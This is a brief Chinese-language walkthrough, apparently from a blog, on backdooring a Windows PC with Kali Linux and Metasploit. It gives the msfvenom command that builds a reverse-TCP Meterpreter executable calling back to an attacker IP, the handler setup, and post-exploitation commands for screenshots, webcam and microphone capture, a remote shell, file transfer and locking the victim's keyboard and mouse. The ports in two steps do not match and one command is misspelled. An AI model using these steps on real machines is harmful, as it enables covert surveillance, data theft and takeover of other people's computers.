1.kali生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.116.128 lport=1234 -f exe > msf.exe

2. 把后门程序丢到windows电脑上打开

3. 执行入侵操作
入侵后自动进入meterpreter模块
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.116.128
msf5 exploit(multi/handler) > set lport 5351
msf5 exploit(multi/handler) > run

4. meterpreter模块操作命令
1. 截屏
screenshot
2. 控制摄像头 麦克风
webcam_list
webcam_snap (拍照)
webcam_stream (摄像)
recoard_mic
3. 进入对方cmd
shell
4. 下载/上传文件
download filepath
upload 本机path 对方path
5. 开关鼠标/键盘
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
6. 其他

网友评论